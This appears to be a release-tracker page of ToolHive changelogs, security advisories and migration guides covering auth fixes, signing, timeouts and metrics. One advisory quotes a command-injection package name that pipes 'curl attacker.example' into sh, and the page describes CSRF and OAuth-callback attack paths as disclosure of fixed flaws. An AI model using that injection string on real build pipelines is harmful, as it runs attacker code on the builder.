NewYour coding agent can read the release notes before it upgrades.Set up the MCP server →
Go modules · #864 by repository stars
Last release 2 days ago
06 Oct 2026
Ships on a steady schedule
a new release about every 8 days
Some releases are documented
notes for 22 of the last 60 stable releases
Nothing withdrawn
no release was ever pulled
2 years old
630 releases · first in 2025
One column per month.
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Clarify MCP admission and rejection diagnostics by @JAORMX in #6727
Full Changelog: v0.51.3...v0.51.4
Embedded authorization server: upstream callback bound to the initiating browser ( GHSA-2gjv-f568-6cxp , High)
/oauth/callback completed a login for whichever browser arrived with a valid upstream state. An attacker who started an authorization for their own client could hand the upstream identity provider URL to a victim and receive an authorization code minted for the victim's identity. The device flow's verification-page login shared the same gap.
Both flows now bind the login to the browser that started it: /oauth/authorize and POST /oauth/device set a per-flow cookie whose hash is stored on the pending record, and the callback completes only when the same browser presents it. The device verification form additionally requires an anti-forgery token, so a cross-site page cannot start a device login from a victim's browser.
What changes for operators and tooling
/oauth/authorize or the device verification page, with cookies enabled for that host. Headless drivers that walk the flow with a plain HTTP client must carry cookies between steps, and must load the device verification form before posting a user_code.redirect_uri, defaulting to {resourceUrl}/oauth/callback in the operator) must share a hostname with the browser-facing authorize URL (authorizationEndpointBaseUrl, else issuer). If the authorize URL is https, a non-loopback callback must be https too. Mismatched deployments log a WARN at startup naming the upstream, and every browser login through it is rejected until fixed.authorizationEndpointBaseUrl is set, the device flow's verification_uri is now advertised from that base URL instead of the issuer.Full Changelog: v0.51.2...v0.51.3
Nothing published for this version
Preserve access across security migrations by @JAORMX in #6712
Route SSE proxy responses to originating session by @rdimitrov in #6702
Full Changelog: v0.51.0...v0.51.1
Bump go.opentelemetry.io/otel/exporters/zipkin from 1.35.0 to 1.45.0 by @dependabot [bot] in #6683
Full Changelog: v0.50.0...v0.51.0
Nothing published for this version
Nothing published for this version
Nothing published for this version
Use self-repository syntax for local workflow refs by @rdimitrov in #6654
Full Changelog: v0.49.0...v0.50.0
Nothing published for this version
It is replaced in place rather than deprecated alongside a second option.
A security- and auth-correctness release: a signer-pin bypass in thv skill upgrade is closed, the embedded auth server's documented zero-downtime key rotation finally works, and AWS STS role claims now fail closed instead of silently handing out the fallback role. This release also ships a dependency-light generated Go client for the management API, and moves the project to Go 1.27.
pkg/vmcp/session.WithDialControl removed — vMCP embedders who set a dial-control hook on the session factory get a compile error; wrap the hook in the new WithDialControlResolver (migration guide below).oauth2 upstreams with a client secret and no explicit tokenEndpointAuthMethod go back to sending credentials in the POST body instead of HTTP Basic; set client_secret_basic explicitly if your IdP requires it (migration guide below).go:// workloads default to golang:1.27-alpine — builds pinned to Go 1.26 with GOTOOLCHAIN=local fail, and go:// servers that do not compile under Go 1.27 need an explicit image pin (migration guide below).session.WithDialControl → session.WithDialControlResolver
Affects Go embedders of vMCP that called session.WithDialControl — the option added in v0.48.0 by #6547. The option was address-blind, so every backend received the same net.Dialer.Control hook and a per-backend dial policy could not be expressed. It is replaced in place rather than deprecated alongside a second option.
On v0.49.0 the old call fails to compile with undefined: session.WithDialControl.
⚠️ pkg/vmcp/client.WithDialControl is unchanged. Only the pkg/vmcp/session option was renamed — do not migrate client.WithDialControl call sites.
factory := session.NewSessionFactory(registry,
session.WithDialControl(denyPrivateRanges),
)factory := session.NewSessionFactory(registry,
// Same hook for every backend — identical to v0.48.0 behavior.
session.WithDialControlResolver(
func(_ string) func(network, address string, c syscall.RawConn) error {
return denyPrivateRanges
},
),
)Per-backend policy — the capability this unlocks. Returning nil for a workload leaves that backend on http.DefaultTransport, byte-for-byte identical to the no-hook path:
session.WithDialControlResolver(
func(workloadID string) func(string, string, syscall.RawConn) error {
if allowsPrivateDialing(workloadID) {
return nil
}
return denyPrivateRanges
},
)session.WithDialControl( call site in the pkg/vmcp/session package — not pkg/vmcp/client, whose identically-named option is unchanged.session.WithDialControlResolver.func(workloadID string) func(network, address string, c syscall.RawConn) error { return hook } to preserve v0.48.0 semantics exactly.workloadID to vary policy per backend; return nil to leave a backend untouched.address — deciding allow/deny from workloadID alone provides no network-level protection.PR: #6567
Migration guide: OAuth2 upstreamtokenEndpointAuthMethod default
Affects anyone on v0.48.0 with a pure oauth2-type upstream provider that uses a pre-registered clientId plus a client secret and leaves tokenEndpointAuthMethod unset.
#6543 (shipped in v0.48.0, and only in v0.48.0) added the token_endpoint_auth_method field, but also made an unset field silently default to client_secret_basic whenever a secret was configured — flipping every existing pre-registered upstream from POST-body credentials to HTTP Basic with no opt-in. v0.49.0 restores the historical default while keeping the new field.
The auth style is strict, not probing: an unset method sends credentials in the token-request POST body and does not retry with Basic. Against a Basic-only IdP the exchange fails with invalid_client — on both initial login and token refresh.
OIDC-type upstreams and Dynamic Client Registration upstreams are unaffected.
apiVersion: toolhive.stacklok.dev/v1beta1
kind: MCPExternalAuthConfig
spec:
type: embeddedAuthServer
embeddedAuthServer:
upstreamProviders:
- name: my-idp
type: oauth2
oauth2Config:
clientId: my-client
clientSecretRef:
name: idp-client-secret
key: client-secret
tokenEndpoint: https://idp.example.com/oauth2/token
# unset -> v0.48.0 silently used client_secret_basic oauth2Config:
clientId: my-client
clientSecretRef:
name: idp-client-secret
key: client-secret
tokenEndpoint: https://idp.example.com/oauth2/token
tokenEndpointAuthMethod: client_secret_basic # now required to get BasicRaw auth-server run config:
upstreams:
- name: my-idp
type: oauth2
oauth2_config:
client_id: my-client
client_secret_env_var: MY_IDP_CLIENT_SECRET
token_endpoint: https://idp.example.com/oauth2/token
token_endpoint_auth_method: client_secret_basic # add thisoauth2 upstream with a client secret.token_endpoint_auth_methods_supported in its discovery document, or its client registration. If only client_secret_basic is accepted, act.tokenEndpointAuthMethod: client_secret_basic on every affected upstreamProviders[].oauth2Config (spec.embeddedAuthServer.upstreamProviders[] for MCPExternalAuthConfig, spec.authServerConfig.upstreamProviders[] for VirtualMCPServer), or token_endpoint_auth_method under upstreams[].oauth2_config in a raw run config.The CRD schema is unchanged apart from doc text, so there is no CRD upgrade ordering concern.
PR: #6648
Migration guide: AWS STS role claim shapes now fail closedAffects deployments using an awsSts external auth config with claim-based roleMappings. Matcher-expression-only configurations are unaffected.
Role mappings are evaluated with the CEL expression claim_value in claims[role_claim_key], and CEL's in only has list and map overloads. Two bugs followed: a string role claim raised a swallowed "no such overload" error and silently produced the fallback role even on an exact match, and an object role claim made in test map-key membership, matching spuriously. Both are now corrected, and unsupported shapes fail closed rather than quietly granting a role.
Two behavior changes, both deliberate:
claim now selects its mapped role instead of fallbackRoleArn. Strings that merely contain the value still do not match.Failed to determine IAM role from the aws_sts middleware, or a failed backend call with failed to select IAM role in vMCP outbound auth.A missing role claim still falls back exactly as before.
{ "sub": "user1", "groups": { "admins": true } }
{ "sub": "user2", "groups": 7 }{ "sub": "user1", "groups": ["admins"] }
{ "sub": "user1", "groups": "admins" }awsSts config and inspect the claim named by awsSts.roleClaim (default groups).fallbackRoleArn. Verify the mapped role's IAM trust policy accepts these subjects and that its permissions suit that population.realm_access.roles to a top-level key — roleClaim is a flat lookup, not a dot path). Alternatively point roleClaim at a correctly-shaped claim, or convert those mappings to matcher CEL expressions, which are evaluated against the raw claims and are unaffected.role claim has unsupported shape, failing closed and claim-based role mapping evaluation failed, failing closed — they name the offending role_arn. Note that CEL expression evaluation failed, skipping mapping was promoted from Debug to Warn, so pre-existing matcher-expression bugs will now appear at default log level.go:// builder image
Two separate audiences.
go:// workload users. The default builder image for go:// workloads moved from golang:1.26-alpine to golang:1.27-alpine. Only freshly built go:// workloads with no override are affected. Go's compatibility promise makes a failure unlikely, but a server relying on a removed deprecated API will not compile.
Downstream Go importers of the root module. github.com/stacklok/toolhive now declares go 1.27.0 with no toolchain directive. Under the default GOTOOLCHAIN=auto Go downloads 1.27 transparently; under GOTOOLCHAIN=local, a pinned-toolchain CI, an air-gapped build, or a distro-packaged Go, the build fails hard with go: go.mod requires go >= 1.27. The nested github.com/stacklok/toolhive/sdk/go module deliberately keeps its go 1.26.0 floor and is not affected.
# ~/.toolhive/config.yaml — previously relied on the golang:1.26-alpine default
runtime_configs: {}# Pin the previous builder image persistently
runtime_configs:
go:
builder_image: "golang:1.26-alpine"
additional_packages:
- ca-certificates
- gitgo:// run, pin per invocation: thv run go://github.com/example/server --runtime-image golang:1.26-alpine.runtime_configs.go.builder_image in ~/.toolhive/config.yaml as above. additional_packages replaces rather than appends to the built-in ["ca-certificates", "git"], so list them explicitly. Only the builder stage is customizable for Go workloads; the runtime stage is always alpine:3.23.GOTOOLCHAIN=auto and allow Go to fetch the toolchain on demand.github.com/stacklok/toolhive/sdk/go instead — it retains the go 1.26.0 floor.setup-go at the root go-version-file: go.mod rather than pinning a version.PR: #6639
github.com/stacklok/toolhive/sdk/go module provides a typed, generated client covering all 77 documented management API operations, with safe default timeout and response-size handling, without pulling in ToolHive's full application dependency graph (#6637).skills/get maps to Action::"get_skill" on the skill's exact URI, and skills/list responses are filtered to the skills the caller may get — previously both methods were refused outright by default-deny, and skills/list without a get_skill permit now returns an empty list instead of a 403 (#6512).thv ai-plugin push --key <cosign.key> is available again for publishers using automatic local server discovery, now that key-signed plugins can be verified at install time with thv ai-plugin install --public-key and pinned in toolhive.lock.yaml for later sync/upgrade; remote or manually configured API URLs must still sign keylessly (#6528).WARN that names the store so an unintended downgrade stays visible (#6551).thv skill upgrade --allow-signer-change no longer doubles as unsigned consent — it previously succeeded against an unsigned candidate, silently dropping a signer-pinned skill's recorded identity and rewriting the lock entry as unsigned: true; both thv skill upgrade and thv ai-plugin upgrade now report failed [unsigned-rejected] and name the uninstall … --scope project then install … --scope project --allow-unsigned sequence that records the exception explicitly (#6629)./.well-known/jwks.json now publishes configured fallback keys alongside the signing key (primary first, de-duplicated by kid), making the documented three-step zero-downtime signing-key rotation actually work instead of a hard cutover that invalidated every outstanding JWT (#6638 — Closes #6451).notifications/progress frames are flushed to the SSE stream, in backend order, before the response closes it (#6491 — Closes #6349).spec.podTemplateSpec no longer get a metadata.generation bump and a spurious DeploymentUpdated event on every statusReportingInterval tick, including the 30s default — pod-template drift detection was comparing user-merged label maps for exact equality (#6377 — Fixes #6340).invalid_client, invalid_grant, …) where a wrapped error could previously degrade to a generic server_error (#6639).miniredis import that broke typecheck — and therefore every test — in pkg/authserver/runner on main (#6636).| Module | Version |
|---|---|
github.com/stacklok/toolhive-core |
v0.0.47 |
Also migrates all Redis call sites from the now-deprecated toolhive-core/redis compatibility facade to redisconn directly (#6646).
👋 Welcome to our newest contributor: @isaacgao4396 🎉
Full commit logFull Changelog: v0.48.0...v0.49.0
🔗 Full changelog: v0.48.0...v0.49.0
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Support OIDC dynamic client registration by @jhrozek in #6544
Full Changelog: v0.47.1...v0.48.0
Nothing published for this version
Run short CI jobs on the standard runner by @rdimitrov in #6541
Full Changelog: v0.47.0...v0.47.1
Nothing published for this version
Log MCPRegistry deprecation at most once by @asjdf in #6366
Full Changelog: v0.46.0...v0.47.0
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
Nothing published for this version
An authentication and supply-chain hardening release: embedded auth servers can now trust private CAs for upstream identity providers, plugin upgrades
An authentication and supply-chain hardening release: embedded auth servers can now trust private CAs for upstream identity providers, plugin upgrades refuse silent signer rotations, and three OAuth flows return the right answer instead of a misleading one.
caBundleRef on an OIDC or OAuth2 upstream, which adds that CA to the system trust roots for discovery, token, user-info, and dynamic client registration calls to that upstream only (#6428).
operator-crds 0.46.0 chart before (or together with) the operator chart — a stale CRD silently prunes caBundleRef from applied resources instead of rejecting it. Existing manifests that do not set caBundleRef reconcile identically and are not restarted by this upgrade.thv ai-plugin upgrade now refuses to install a plugin update whose signature identity differs from the one recorded in the project lock file — or that is unsigned — reporting signer-change-blocked and exiting 4 until you confirm the rotation with the new --allow-signer-change flag, which re-records the new identity in the lock (#6401).
TOOLHIVE_PLUGINS_LOCK_ENABLED; lock entries with no recorded provenance are unaffected.thv llm setup now fails fast with an actionable "callback port already in use" message instead of silently switching to a random port that your identity provider would reject — free the port or pass --callback-port <port> with a redirect URI registered with your IdP (#6432).access_denied OAuth error, so clients stop treating a deliberate denial as a retryable server failure (#6441).👋 Welcome to our newest contributor: @alex-feel 🎉
Full commit logFull Changelog: v0.45.0...v0.46.0
🔗 Full changelog: v0.45.0...v0.46.0
Nothing published for this version
Nothing published for this version
/metrics on the transport port is deprecated in favour of the dedicated diagnostics listener (default port 9464 ) — the transport-port copy still serv…
A security-and-supply-chain release: two coordinated fixes harden the thv serve management API and the container build path, plugin artifacts gain end-to-end Sigstore verification, and skill pushes are now signed keylessly by default. Alongside that, Prometheus metrics move to a dedicated diagnostics port behind a migration switch, the embedded auth server gains two new RFC 7523 flows, and Virtual MCP finally honours configured backend timeouts and propagates backend health changes to live sessions.
thv serve management API are now rejected — the management API creates workloads with caller-named host bind mounts, registers MCP servers into on-disk agent configs, and installs skill artifacts, all as unauthenticated state-changing routes in the default configuration, and a cross-origin web page could drive it with a CORS "simple" POST that never triggers a preflight. This is GHSA-xv9h-79wp-q9w6. Two independent barriers are added for TCP listeners only (migration guide below).npx://, uvx:// and go:// references were interpolated into RUN instructions unvalidated; they are now constrained to a character class that excludes shell metacharacters, and the two remaining bare interpolations in the templates are quoted (migration guide below).tools/list/prompts/list/resources/list response failed every decode and sniff and passed through unfiltered, leaking entries the Cedar policy or tool filter was supposed to remove (#6304).Flush() committed an implicit WriteHeader(200), so a backend 500 reached the client as a 200 carrying the full unfiltered list (#6335).thv serve now requires Content-Type: application/json on state-changing requests that carry a body, and validates Origin on loopback TCP binds — non-JSON callers get 415 Unsupported Media Type (migration guide below)[A-Za-z0-9@/:._+=~[]-] — a npx:///uvx:///go:// reference containing anything else now fails at build time instead of being interpolated into the Dockerfile (migration guide below)thv skill sync without --clients now targets every skill-supporting client — combined with the new qoder client, every locked skill reports as drifted on the first sync after upgrading, and thv skill sync --check exits non-zero in CI (migration guide below)runtime_config.build_with on npx:///go:// images is now a 400, and runtime_config.runtime_env is now actually applied to the built image — both were silently discarded by the workload REST API (migration guide below)thv skill push requires exactly one of --key, --identity-token, or --no-sign — key + no_sign was previously accepted and pushed an unsigned artifact; it is now a 400 (migration guide below)operational.timeouts — a configured value below 30 s will now actually cut backend calls that previously got the silent 30 s default (migration guide below)plugins.MaterializationAdapter, state.Store writers, storage.UpstreamTokenStorage, and six function signatures. No effect on the CLI, the operator, the wire protocol, or persisted state (migration guide below)thv llm local proxy returns 401 token_required instead of 502 server_error when the stored credential has been rejected by the IdP (#6389)Who is affected: anything calling the thv serve management API over TCP with a POST/PUT/PATCH/DELETE that carries a body but does not set Content-Type: application/json. Studio is not affected — it runs thv serve --socket=<path>, and the UNIX-socket path skips both barriers entirely. Empty-body mutating routes (stop, restart) are unaffected, as are all GET/HEAD requests.
Two barriers were added to the middleware chain, for TCP listeners only:
thv proxy path. A non-loopback bind (or --port 0) yields no allowlist and passes through, matching that path's behaviour; a WARN is logged so the disabled state is visible.application/json enforcement on state-changing requests with a body. text/plain, the form encodings, and an absent Content-Type are all CORS "simple" types exempt from preflight, and the handlers decoded them as JSON regardless. Requiring application/json forces a preflight the browser cannot clear. Chunked bodies (Content-Length: -1) take the strict path.# Accepted in v0.44.0 — body decoded as JSON regardless of Content-Type
curl -X POST http://127.0.0.1:8080/api/v1beta/workloads \
-d '{"name":"fetch","image":"ghcr.io/example/fetch:latest"}'# v0.45.0 — Content-Type is required
curl -X POST http://127.0.0.1:8080/api/v1beta/workloads \
-H 'Content-Type: application/json' \
-d '{"name":"fetch","image":"ghcr.io/example/fetch:latest"}'Content-Type: application/json to every request your client sends to thv serve that carries a body. Most HTTP clients already do; curl -d and bare fetch() do not.application/json; charset=UTF-8 also matches — the parameter is stripped before comparison.thv serve on a non-loopback address, note that Origin validation is a pass-through there. Put it behind a reverse proxy that enforces Origin, and check for the startup WARN naming the bind address.thv serve --socket=<path>, nothing changes.Fixed in commit 7f15a63 — GHSA-xv9h-79wp-q9w6
Who is affected: anyone running thv run npx://…, uvx://… or go://… with a package reference containing characters outside A-Za-z0-9 and @ / : . _ + = ~ [ ] -. In practice this is nobody using a legitimate npm scope, PyPI pin/extra, or Go module path — the allowed set was chosen to cover all three ecosystems.
The package name is interpolated into RUN instructions in npx.tmpl, uvx.tmpl and go.tmpl. Before this change nothing validated it, so a name carrying shell metacharacters could break out of the instruction and execute arbitrary commands during the image build. The two remaining bare interpolations in npx.tmpl and go.tmpl are now single-quoted as well.
# v0.44.0: interpolated into `RUN npm install --save <name>` unvalidated
thv run "npx://some-pkg; curl attacker.example | sh"invalid package name "some-pkg; curl attacker.example | sh": only letters, digits
and the characters @/:._+=~[]- are allowed
invalid package name, check the reference for spaces, quotes, ;, $, backticks, or parentheses.npx://@scope/pkg@1.2.3, uvx://pkg[extra]==1.0, go://github.com/org/mod/cmd/tool@v1.2.3, go://./local/path.Fixed in commit 68dc1ba
Who is affected: every user of thv skill sync and POST /api/v1beta/skills/sync, and most acutely CI pipelines running thv skill sync --check.
Two changes combine. entryMatchesInstalled now treats a lock entry as current only if the installed skill covers every skill-supporting client, not just the clients it was recorded against; and reinstallPinned no longer falls back to the previously recorded client list. Independently, #5870 added Qoder as the 18th skill-supporting client.
The result: any skill locked under v0.44.0 has a recorded client list that cannot contain qoder, so it is reported as drifted on the first sync after upgrade — and a bare thv skill sync will materialize it into <project>/.qoder/skills/ as well. thv skill sync --check exits with the check-failure code, so a previously green CI gate turns red purely from the upgrade.
# v0.44.0 — preserved the recorded client list, reported AlreadyCurrent
thv skill sync
thv skill sync --check # exit 0# v0.45.0 — pass the client list you actually want
thv skill sync --clients claude-code
thv skill sync --check --clients claude-code # exit 0thv skill sync --check once after upgrading and expect drift on every locked skill. This is expected, not corruption.thv skill sync once to materialize skills into all skill-supporting clients, including the new .qoder/skills/. Subsequent --check runs go green.--clients explicitly on every sync (and {"clients": [...]} on the REST endpoint) so the expected set is exactly what you specify.thv, so the gate does not fail on the upgrade commit..qoder/skills/ in a project tree is unwanted, add it to .gitignore or constrain --clients.thv skill upgrade is unchanged — it still preserves the existing client list.Who is affected: REST callers of POST /api/v1beta/workloads and the workload update endpoint that send runtime_config.
The request type is *templates.RuntimeConfig and Swagger published all four of its fields, but the service layer only ever copied builder_image and additional_packages. A caller posting runtime_config.build_with got 201 Created and a workload built with unconstrained dependencies — silently, which is exactly the failure build_with exists to prevent. runtime_env was dropped the same way.
POST /api/v1beta/workloads
{"name": "x", "image": "npx://some-pkg", "runtime_config": {"build_with": ["mcp<2"]}}
→ 201 Created (build_with silently discarded, dependencies unconstrained)POST /api/v1beta/workloads
{"name": "x", "image": "npx://some-pkg", "runtime_config": {"build_with": ["mcp<2"]}}
→ 400 Bad Request
"build_with is not supported for npx:// builds (only uvx://)"runtime_config.build_with from requests using npx:// or go:// images — it was never applied. Only uvx:// supports it.runtime_config.runtime_env you were sending: it now actually lands in the built image. Keys must match ^[A-Z][A-Z0-9_]*$, must not be reserved (PATH, HOME, USER, SHELL, PWD, HOSTNAME, TERM, LANG, LC_ALL, LD_PRELOAD, LD_LIBRARY_PATH), and values must not contain shell metacharacters.. or _, and names over 128 characters, now return an actionable 400 instead of a scrubbed 500 Internal Server Error. The workload was never created in either case.GET → edit → PUT of a protocol-built workload now succeeds instead of returning 400 and erasing the build configuration — no action needed, but re-test any round-trip tooling.--build-with should match build_with instead; the message is now shared by the CLI, the API, the TUI and the config file.Who is affected: callers of POST /api/v1beta/skills/push, skillsvc.Push, and thv skill push that supplied more than one signing input.
Push previously only checked "key or no_sign". Supplying both meant no_sign silently won and the artifact was published unsigned. It is now a 400.
{"reference": "ghcr.io/org/s:v1", "key": "/keys/cosign.key", "no_sign": true}
→ 200 OK (artifact pushed UNSIGNED — no_sign silently won){"reference": "ghcr.io/org/s:v1", "key": "/keys/cosign.key", "no_sign": true}
→ 400 "no_sign (--no-sign) cannot be combined with key (--key) or identity_token (--identity-token)"
// Choose exactly one:
{"reference": "ghcr.io/org/s:v1", "key": "/keys/cosign.key"} // key-pair signed
{"reference": "ghcr.io/org/s:v1", "identity_token": "<raw JWT>"} // keyless
{"reference": "ghcr.io/org/s:v1", "no_sign": true} // explicitly unsignedkey / identity_token / no_sign per push."signing key required" — it is now "signing credential required".thv skill push with no flags no longer fails. In GitHub Actions with id-token: write it signs keylessly from the ambient OIDC token; on an interactive terminal it prompts for a browser sign-in; anywhere else it fails client-side with an actionable error before anything is published. In CI and automation, pass one of the three flags explicitly rather than relying on the default.PRs: #6385, #6390 — Closes #6307
Migration guide: vMCP backend timeouts are now honouredWho is affected: Virtual MCP operators who set operational.timeouts.default or operational.timeouts.perWorkload. Deployments that omit operational.timeouts are unaffected — three independent 30 s fallbacks keep the default behaviour identical.
vMCP accepted the documented timeout settings but never used them for backend MCP calls; backend clients kept a hardcoded 30 s, and a separate 30 s server WriteTimeout could close a POST before a slow backend returned anything. Both are now driven by configuration.
operational:
timeouts:
default: 5s # accepted, then ignored — backends actually got 30s
perWorkload:
slow-backend: 5m # accepted, then ignored — capped at 30soperational:
timeouts:
default: 30s # raise short values back to 30s to preserve v0.44.0 behaviour
perWorkload:
slow-backend: 5m # now genuinely applied — size capacity accordinglygrep -A3 'timeouts:' <vmcp-config> or kubectl get virtualmcpserver -o yaml | grep -A5 timeouts.30s to preserve v0.44.0 behaviour, or keep them deliberately and verify your slowest tools/call completes inside the window.initOneBackend uses max(30s, requestTimeout), so a short configured value never shortens init.failed to <op> for backend <id> (timeout) in logs after upgrade to spot a value set too low.operational.failureHandling.healthCheckTimeout is separate and unaffected, and the cross-pod session-restore path is still a fixed 15 s.Who is affected: Go consumers importing ToolHive packages. None of these affect the CLI, the operator, the wire protocol, or persisted state.
| Package | Change | PR |
|---|---|---|
pkg/plugins |
MaterializationAdapter gains required EnsureRegistered(ctx, DematerializeRequest) error and Health(ctx, DematerializeRequest) error |
#6314 |
pkg/groups |
RemovePluginFromAllGroups removed (use RemovePluginFromGroup per group); AddPluginToGroup and AddSkillToGroup now return (added bool, err error) |
#6314, #6352 |
pkg/state |
Writers must implement Aborter; Close() now publishes and can fail |
#6350 |
pkg/skills |
InstallOptions.Visited removed, replaced by ExpectedCanonicalName string |
#6352 |
pkg/authserver/storage |
UpstreamTokenStorage (and transitively Storage) gains required ResolveUpstreamTokenRowID |
#6361 |
pkg/authserver/server/registration |
LoopbackClient, NewLoopbackClient, MatchRedirectURI, GetMatchingRedirectURI removed; use the free function RegisteredLoopbackRedirectURI |
#6215 |
pkg/authserver/server/registration |
ValidateDCRRequest gains an allowPrivateKeyJWT bool parameter |
#6427 |
pkg/authserver/server/tokenexchange |
ValidateTrustedIssuers and NewMultiIssuerTokenValidator gain an allowedAudiences []string parameter |
#6391 |
pkg/api/v1 |
WorkloadService.BuildFullRunConfig gains a fourth parameter |
#6214 |
cmd/thv-operator/pkg/validation |
ValidateRemoteURL(rawURL string) → ValidateRemoteURL(rawURL string, opts ValidateRemoteURLOptions) |
#6195 |
Two of these deserve concrete code:
pkg/state — writers must abort, and Close() publishesLocalStore writers now write to a temp file and publish atomically on Close (os.Rename for GetWriter, os.Link for CreateExclusive). Three consequences: the target name does not exist until Close; Close returns real errors that must be handled; and CreateExclusive conflicts surface from Close rather than from the call itself.
Aborter is documented as required but enforced only at runtime — a Store whose writer lacks Abort() still compiles, and every abandon path then returns "state writer does not support abort" and leaks the file handle. Add a compile-time assertion.
// Before
writer, err := store.GetWriter(ctx, name)
if err != nil { return err }
defer func() {
if err := writer.Close(); err != nil { slog.Warn("failed to close writer", "error", err) }
}()
if _, err := writer.Write(data); err != nil { return err }
return nil
// After
var _ state.Aborter = (*myWriter)(nil) // catch a missing Abort() at compile time
writer, err := store.GetWriter(ctx, name)
if err != nil { return err }
closed := false
defer func() {
if !closed {
if err := state.AbortWriter(writer); err != nil {
slog.Warn("failed to abort writer", "name", name, "error", err)
}
}
}()
if _, err := writer.Write(data); err != nil { return err }
if err := writer.Close(); err != nil { // this is the publish — must be returned
closed = true
return fmt.Errorf("failed to close writer: %w", err)
}
closed = true
return nilpkg/plugins — two new adapter methods// EnsureRegistered re-applies only the client-config registration, without
// re-extracting files. Must be idempotent.
func (a *MyAdapter) EnsureRegistered(ctx context.Context, req plugins.DematerializeRequest) error {
dir, err := a.paths(req)
if err != nil { return err }
return a.writeRegistration(req.Name, dir)
}
// Health is a presence check only — do not hash file contents into a digest.
func (a *MyAdapter) Health(ctx context.Context, req plugins.DematerializeRequest) error {
dir, err := a.paths(req)
if err != nil { return err }
if _, err := os.Stat(dir); err != nil {
return fmt.Errorf("plugin directory missing: %w", err)
}
return a.registrationPresent(req.Name, dir)
}task gen after updating any implementation.UpstreamTokenStorage, return a deterministic, non-empty, side-effect-free ID derived from your key scheme, and do no I/O — resolution happens before the singleflight joins, so a round-trip defeats the dedup. Never alias rows that are not physically the same row.RegisteredLoopbackRedirectURI, note the changed return semantics: the old method returned the requested URI (dynamic port preserved); the new function returns the registered URI. Keep your own requested value if you need the port.httperr.Code(err) == http.StatusConflict check from the CreateExclusive call site to the Close() call site./metrics on the transport port is deprecated in favour of the dedicated diagnostics listener (default port 9464) — the transport-port copy still serves by default in v0.45.0 via metricsOnTransportPort, but that default will flip in a future release (#6296, #6370, #6371, #6368)Existing scrape configurations keep working in v0.45.0. DefaultMetricsOnTransportPort is true and the field is a *bool with no CRD default, so an unset value inherits the release default and is not pinned into stored config. Metrics are simply served in two places during the migration window.
Why the move: /metrics shared the port that serves MCP traffic, which the operator binds to 0.0.0.0 and the Service maps. Kubernetes NetworkPolicy matches on pods, ports and protocols and cannot filter on HTTP path, so while the endpoint shares the transport port there is no way to express "allow MCP traffic, deny metrics scraping". Note the move adds no authentication — the diagnostics listener carries no middleware by design, and restricting who can reach the port is what protects it.
# CLI
thv run --otel-metrics-on-transport-port=false …# Operator — MCPTelemetryConfig
spec:
prometheus:
metricsOnTransportPort: false
# Operator — VirtualMCPServer (inline)
spec:
config:
telemetry:
metricsOnTransportPort: false
prometheusPort: 9464 # vMCP only; MCPServer/MCPRemoteProxy are fixed at 94649464 unless overridden) and confirm metrics arrive.metricsOnTransportPort: false and confirm nothing else was still scraping the transport port.NetworkPolicy — see docs/observability.md. It binds 0.0.0.0 under the operator, so any pod in the cluster can reach it by pod IP until you do. Do not add it to a Service or Ingress.containerPort or Service port is declared, ServiceMonitor/named-port PodMonitor discovery will not find it — scrape with kubernetes_sd_configs role: pod and an explicit __address__ relabel to :9464.404 on the transport port once you opt out (the body explains itself and names the log line to grep for).One genuinely breaking side effect, still present: when ToolHive metrics are not served on the transport port, /metrics now returns 404 on the application listener instead of falling through to the backend. Under the transparent proxy — remote servers via thv run <url> / MCPRemoteProxy, and container sse/streamable-http workloads — a backend that exposed its own /metrics through the ToolHive proxy is no longer reachable there. Scrape such backends directly instead.
kubectl apply of the raw virtualmcpservers CRD exceeds the 262144-byte annotation limit. This is pre-existing (it was already over at v0.44.0) rather than introduced here, but #6183 grew the mcpservers and mcpremoteproxies CRDs ~2.5× by expanding the corev1.Affinity schema, so it is worth stating plainly. helm install/upgrade and Flux are unaffected; Argo CD with the default client-side apply is not. Use kubectl apply --server-side --force-conflicts -f <crd-dir>, or add ServerSideApply=true to the Argo CD Application's syncOptions.MCPServer readiness honest. A server whose workload StatefulSet was deleted out-of-band previously reported Ready=True while clients hit a dead backend; it now reports Pending / Ready=False and is auto-healed by bouncing the proxy (2-minute cooldown). Only already-broken servers are affected, but kubectl wait --for=condition=Ready and Argo/Flux health checks will now correctly show them as not ready. The operator also adopts a controller owner-ref on that StatefulSet — adoption is metadata-only and causes no pod churn, but deleting an MCPServer now garbage-collects its StatefulSet even if the finalizer does not run.allowPrivateKeyJwtRegistration — a v0.44.0 replica silently drops the new jwks field when reading a row a v0.45.0 replica wrote.private_key_jwt (RFC 7523 §2.2) instead of a shared secret, generating their own keypair and registering only the public half (#6427)nodeSelector, tolerations and affinity under resourceOverrides.proxyDeployment, so the proxy lands on the same pre-warmed pool as its server (#6183)MCPServerEntry and MCPRemoteProxy gain spec.allowPrivateEndpoint, letting a Virtual MCP reach a co-located in-cluster backend in-mesh so the backend's workload-identity authorization still applies — loopback, link-local, cloud-metadata and kubernetes.default* stay blocked regardless (#6195)9464) for both the proxy and Virtual MCP, so access can be governed by port with a NetworkPolicy (#6296, #6368), reachable from the CLI via --otel-metrics-on-transport-port and from the operator via prometheus.metricsOnTransportPort (#6371)toolhive_rate_limit_fail_open_total counter and a rate_limit.fail_open span attribute record when a check failed open after a Redis error (#6282)thv skill push signs keylessly by default: the CLI acquires an OIDC identity token (GitHub Actions ambient token in CI, browser sign-in on a terminal) and the server exchanges it with Fulcio and records a Rekor entry (#6385, #6390); release pushes in CI are signed rather than carrying the old --no-sign stopgap, and a new staging job verifies the result with stock cosign (#6402)provenance, that becomes the expected signer identity (#6420)TOOLHIVE_PLUGINS_LOCK_ENABLED=true and inert by default: project installs pin into toolhive.lock.yaml (#6314), thv ai-plugin sync restores and drift-checks them (#6316), thv ai-plugin upgrade advances a pin under review (#6317), bundles and git signatures are persisted (#6396), signatures are verified at install (#6397), and stored signatures are re-verified offline on every sync (#6399)thv client register qoder configures Qoder IDE for MCP server integration and skill installation (#5870)kubectl get mcpgroup shows a Proxies column from status.remoteProxyCount, so a group made entirely of MCPRemoteProxy members no longer looks empty (#6376)notifications/tools/list_changed and an updated tools/list when a backend recovers or fails health 